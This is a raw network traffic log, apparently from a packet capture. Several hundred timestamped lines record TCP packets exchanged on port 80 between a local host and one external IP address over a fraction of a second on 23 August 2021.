Aug 23, 2021 02:08:38.363153934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363181114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363200903 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363223076 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363254070 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363259077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363296032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363296986 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363337994 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363349915 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363377094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363411903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363411903 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363449097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363487005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363487959 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363521099 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363522053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363558054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363585949 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363595009 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363610029 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363636971 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363646984 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363678932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363696098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363714933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363739967 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363751888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363780022 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363790035 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363801003 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363825083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363862038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363863945 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363898039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363925934 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363936901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363962889 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.363974094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.363984108 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364010096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364037037 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364047050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364073038 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364083052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364108086 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364119053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364147902 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364156008 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364182949 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364192009 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364207983 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364238977 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364249945 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364276886 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364312887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364340067 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364348888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364372969 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364386082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364408970 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364423037 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364444017 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364459038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364463091 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364495993 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364540100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364540100 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364578962 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364603996 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364614964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364650965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364670038 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364686966 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364710093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364723921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364748001 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364761114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364784956 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364797115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364840031 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364846945 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364878893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364888906 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364916086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364938021 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364950895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.364974022 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.364999056 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365010023 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365041018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365052938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365084887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365096092 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365125895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365127087 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365171909 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365173101 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365215063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365225077 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365256071 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365258932 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365295887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365307093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365335941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365340948 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365374088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365379095 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365415096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365416050 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365453959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365456104 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365497112 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365499973 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365540981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365544081 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365577936 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365580082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365621090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365624905 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365659952 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365659952 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365700960 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365704060 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365741968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365760088 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365782022 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365803003 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365827084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365840912 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365868092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365905046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365945101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.365956068 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.365986109 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.366013050 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.366024017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.366048098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.366063118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.366094112 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.366103888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.366139889 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.366149902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.366189957 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.366193056 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.366219044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.366233110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.366255999 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.366283894 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.385869980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.385931015 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.385967016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.385992050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386018038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386039972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386048079 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.386063099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386094093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386097908 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.386137009 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386138916 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.386158943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386169910 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.386188984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386212111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.386221886 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.386282921 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.387099981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.387144089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.387224913 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397145033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397167921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397196054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397211075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397227049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397234917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397243977 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397258997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397272110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397286892 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397289038 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397298098 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397315025 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397320032 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397330046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397345066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397351980 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397361040 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397381067 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397403955 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397512913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397528887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397545099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397559881 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397572041 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397587061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397603989 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397613049 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397619009 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397650957 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397660971 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397711992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397727013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397746086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397763968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397769928 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397778034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397794008 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397804022 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397810936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397825003 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397826910 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397840977 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397850037 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397855997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397874117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397885084 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397891045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397906065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.397922039 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397944927 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.397984028 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398000956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398015976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398030996 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398039103 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398046017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398067951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398087025 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398235083 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398248911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398267984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398284912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398294926 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398299932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398341894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398344040 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398359060 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398374081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398375034 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398390055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398406029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398411989 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398421049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398437023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398452997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398454905 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398464918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398475885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398488045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398503065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398518085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398530006 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398539066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398554087 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398559093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398566961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398582935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398586035 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398597956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398613930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398628950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398629904 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398648024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398664951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398674011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398679972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398695946 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398703098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398710966 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398725986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398736000 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398741961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398756027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398757935 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398773909 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398781061 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398791075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398806095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398818016 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398821115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398837090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398850918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398853064 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398864985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398874044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398880005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398899078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398911953 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398915052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398930073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398945093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.398952961 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.398987055 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.399063110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.399080038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.399097919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.399127960 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.399141073 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.399147034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.399163961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.399178982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.399204969 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.399236917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.399439096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.403237104 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417002916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417035103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417059898 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417090893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417119026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417150021 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417151928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417201042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417222977 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417237997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417248011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417268991 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417288065 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417303085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417313099 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417340994 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417381048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417416096 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417419910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417455912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417460918 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417494059 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417529106 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417541027 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.417565107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.417576075 CEST	49735	80	192.168.2.3	193.142.59.123
